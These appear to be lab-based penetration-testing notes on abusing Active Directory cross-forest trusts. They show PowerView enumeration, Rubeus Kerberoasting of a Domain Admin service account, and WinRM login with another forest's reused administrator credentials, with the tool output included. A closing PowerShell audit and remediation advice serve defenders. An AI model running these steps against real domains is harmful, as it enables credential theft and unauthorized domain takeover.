Cross-Forest Trust Abuse - from Windows

Cross-Forest Kerberoasting

Kerberos attacks such as Kerberoasting and ASREPRoasting can be performed across trusts, depending on the trust direction. If you are positioned in a domain that has an inbound or bidirectional domain/forest trust, you can likely perform these attacks against the trusting domain to gain a foothold there. Sometimes you cannot escalate privileges in your current domain, but you can instead obtain a Kerberos ticket and crack the hash of an administrative user in another domain who holds Domain/Enterprise Admin privileges in both domains.

PS C:\xyz> Get-DomainUser -SPN -Domain LEGALLOGISTICS.LOCAL | select SamAccountName

samaccountname
--------------
krbtgt
mssqlsvc

A quick check shows that the mssqlsvc account is a member of the Domain Admins group in the target domain, so if we can Kerberoast it and crack the hash offline, we would have full admin rights over that domain.

PS C:\xyz> Get-DomainUser -Domain LEGALLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof
-------------- --------
mssqlsvc       CN=Domain Admins,CN=Users,DC=LEGALLOGISTICS,DC=LOCAL

Performing a Kerberoasting Attack with Rubeus Using the /domain Flag

PS C:\xyz> .\Rubeus.exe kerberoast /domain:LEGALLOGISTICS.LOCAL /user:mssqlsvc /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : mssqlsvc
[*] Target Domain          : LEGALLOGISTICS.LOCAL
[*] Searching path 'LDAP://ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL/DC=LEGALLOGISTICS,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=mssqlsvc)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

[*] SamAccountName         : mssqlsvc
[*] DistinguishedName      : CN=mssqlsvc,CN=Users,DC=LEGALLOGISTICS,DC=LOCAL
[*] ServicePrincipalName   : MSSQLsvc/sql01.freightlogstics:1433
[*] PwdLastSet             : 3/24/2022 12:47:52 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mssqlsvc$LEGALLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstics:1433@LEGALLOGISTICS.LOCAL*$<SNIP>

We could then run the hash through Hashcat. If it cracks, we have quickly expanded our access to full control of two domains by leveraging a fairly standard attack and abusing the authentication direction and setup of the bidirectional forest trust.

Admin Password Re-Use & Group Membership

We can use the PowerView function Get-DomainForeignGroupMember to enumerate groups with users that do not belong to the domain, also known as foreign group membership. Let's try this against the LEGALLOGISTICS.LOCAL domain with which we have an external bidirectional forest trust.

PS C:\xyz> Get-DomainForeignGroupMember -Domain LEGALLOGISTICS.LOCAL

GroupDomain             : LEGALLOGISTICS.LOCAL
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=LEGALLOGISTICS,DC=LOCAL
MemberDomain            : LEGALLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGISTICS,DC=LOCAL

PS C:\xyz> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

LEGALCORP\administrator

The output above shows that the built-in Administrators group in LEGALLOGISTICS.LOCAL contains the built-in Administrator account of the legalcorp.local domain as a member. We can verify this access with the Enter-PSSession cmdlet, connecting over WinRM.

PS C:\xyz> Enter-PSSession -ComputerName ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL -Credential LEGALCORP\administrator

[ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL]: PS C:\Users\administrator.LEGALCORP\Documents> whoami
LEGALCORP\administrator

[ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL]: PS C:\Users\administrator.LEGALCORP\Documents> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
   Primary Dns Suffix  . . . . . . . : LEGALLOGISTICS.LOCAL
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : LEGALLOGISTICS.LOCAL

From the command output above, we can see that we successfully authenticated to the Domain Controller in the LEGALLOGISTICS.LOCAL domain using the Administrator account from the legalcorp.local domain across the bidirectional forest trust. This can be a quick win after taking control of a domain and is always worth checking for when a bidirectional forest trust is present during an assessment and the second forest is in scope.
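A defender-side audit of the two conditions this page relies on (a privileged, SPN-bearing account in the trusted domain, and foreign security principals in its Administrators group), written here as an added example and not taken from the original notes. It uses the RSAT ActiveDirectory module rather than PowerView, and $TargetDomain is an assumed parameter.

```powershell
# Added defensive audit; not part of the original notes. Assumes the RSAT ActiveDirectory
# module and a read-only account in the local forest. $TargetDomain is a hypothetical parameter.
param([string]$TargetDomain = 'LEGALLOGISTICS.LOCAL')
Import-Module ActiveDirectory

# 1. Trust inventory: the direction decides which way authentication (and so roasting) can flow.
Get-ADTrust -Filter * |
    Select-Object Name, Direction, ForestTransitive, IntraForest, TrustType |
    Format-Table -AutoSize

# 2. SPN-bearing accounts in the trusted domain that sit in a privileged group: the exact
#    profile of mssqlsvc above. No AES bit set means the KDC falls back to RC4 for the ticket.
$privileged = @('Domain Admins', 'Enterprise Admins', 'Administrators')
Get-ADUser -Server $TargetDomain -Filter 'ServicePrincipalName -like "*"' `
    -Properties ServicePrincipalName, MemberOf, 'msDS-SupportedEncryptionTypes', PasswordLastSet |
  ForEach-Object {
    $u      = $_
    $groups = @($u.MemberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=' })
    $hits   = @($groups | Where-Object { $privileged -contains $_ })
    if ($hits.Count -gt 0) {
        $etypes = [int]($u.'msDS-SupportedEncryptionTypes')   # unset attribute -> 0
        $age    = if ($u.PasswordLastSet) { (New-TimeSpan -Start $u.PasswordLastSet).Days } else { $null }
        [pscustomobject]@{
            Account      = $u.SamAccountName
            PrivilegedIn = ($hits -join ';')
            PasswordAge  = $age
            AesEnabled   = [bool]($etypes -band 0x18)       # 0x08 = AES128, 0x10 = AES256
        }
    }
  } | Format-Table -AutoSize

# 3. Foreign security principals in the trusted domain's Administrators group: the cross-forest
#    admin membership found with Get-DomainForeignGroupMember above. Resolve each SID to a name.
$admins = Get-ADGroup -Server $TargetDomain -Identity 'Administrators' -Properties member
$admins.member | Where-Object { $_ -like '*,CN=ForeignSecurityPrincipals,*' } | ForEach-Object {
    $sid = ($_ -split ',')[0] -replace '^CN='
    try   { $name = ([System.Security.Principal.SecurityIdentifier]$sid).Translate([System.Security.Principal.NTAccount]).Value }
    catch { $name = '<unresolved>' }
    [pscustomobject]@{ Group = 'Administrators'; Domain = $TargetDomain; ForeignSid = $sid; ResolvesTo = $name }
} | Format-Table -AutoSize
```

Any row in the second table with AesEnabled false and a large PasswordAge, or any foreign SID in the third table that resolves to another forest's built-in Administrator, is the finding to remediate (long random service-account password or gMSA, AES-only encryption types, and removal of cross-forest admin membership).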